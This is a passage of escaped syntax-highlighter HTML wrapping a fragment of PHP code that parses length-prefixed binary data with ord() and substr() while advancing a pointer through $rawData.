inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-24&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-25&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-26&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-27&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-28&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;						&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-29&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-30&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-31&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-32&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-33&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-34&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: 